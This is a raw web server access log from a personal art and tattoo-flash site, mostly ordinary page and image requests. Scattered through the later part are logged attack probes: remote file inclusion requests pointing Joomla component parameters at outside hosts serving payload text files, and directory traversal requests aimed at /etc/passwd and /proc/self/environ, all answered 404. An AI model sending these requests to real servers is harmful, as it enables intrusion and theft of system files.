76.118.83.235 - - [31/May/2010:19:10:29 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=bert+grimm+tattoo+flash""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:36 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:37 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:37 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:38 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:10:38 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:14 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:43 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:43 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:43 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:43 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:43 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:11:44 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:12:11 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:12:11 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:12:12 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:12:12 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:12:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:14:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
76.118.83.235 - - [31/May/2010:19:14:23 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
74.124.198.60 - - [31/May/2010:19:15:00 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:00 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:00 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:22 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:22 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:22 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:24 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:24 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:15:24 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.204.188 - - [31/May/2010:19:15:55 -0500] "GET /logs/access_log.1239753600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [31/May/2010:19:16:04 -0500] "GET /logs/access_log.1263168000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.178.112.69 - - [31/May/2010:19:20:44 -0500] "GET /logs/inurl:%22com_g2bridge%22/../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 363 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
195.178.112.69 - - [31/May/2010:19:20:45 -0500] "GET /inurl:%22com_g2bridge%22/../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
207.7.108.203 - - [31/May/2010:19:20:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [31/May/2010:19:20:46 -0500] "GET /index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [31/May/2010:19:20:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
74.124.198.60 - - [31/May/2010:19:20:58 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:20:58 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:20:58 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
122.58.115.31 - - [31/May/2010:19:23:49 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "http://www.bing.com/images/search?q=totems+&go=&form=QBIR&qs=n&sk=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:49 -0500] "GET /artwork/eagle.jpg HTTP/1.1" 200 13397 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:50 -0500] "GET /artwork/eagle-installed.png HTTP/1.1" 200 45593 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:50 -0500] "GET /artwork/don%27t_tread_on_us.png HTTP/1.1" 200 52753 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/fakir.jpg HTTP/1.1" 200 22839 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/cat-in-cage.png HTTP/1.1" 200 56736 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/ballerina_sailfish.png HTTP/1.1" 200 54573 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/totems.jpg HTTP/1.1" 200 76206 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/totems2.png HTTP/1.1" 200 65973 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/boxfishstack.png HTTP/1.1" 200 44901 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/ballerina-fish-music.jpg HTTP/1.1" 200 34902 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/fishplatter1.png HTTP/1.1" 200 33135 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/fish2.jpg HTTP/1.1" 200 8671 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:51 -0500] "GET /artwork/metamorfish.jpg HTTP/1.1" 200 30815 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:52 -0500] "GET /artwork/msgr.jpg HTTP/1.1" 200 18047 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:52 -0500] "GET /artwork/spikemask.png HTTP/1.1" 200 59637 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:52 -0500] "GET /artwork/tackyservice.jpg HTTP/1.1" 200 36999 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:52 -0500] "GET /artwork/temptation1.jpg HTTP/1.1" 200 65929 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
122.58.115.31 - - [31/May/2010:19:23:52 -0500] "GET /artwork/tightfishwalker.jpg HTTP/1.1" 200 56881 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
207.46.204.244 - - [31/May/2010:19:24:56 -0500] "GET /logs/access_log.1178841600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.67.251.220 - - [31/May/2010:19:29:38 -0500] "GET /logs//index.php?option=com_sbsfile&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
201.67.251.220 - - [31/May/2010:19:29:38 -0500] "GET //index.php?option=com_sbsfile&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
201.67.251.220 - - [31/May/2010:19:29:38 -0500] "GET /logs//index.php?option=com_sbsfile&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
201.67.251.220 - - [31/May/2010:19:29:38 -0500] "GET //index.php?option=com_sbsfile&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
74.55.135.18 - - [31/May/2010:19:29:56 -0500] "GET //citywriter/head.php?path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
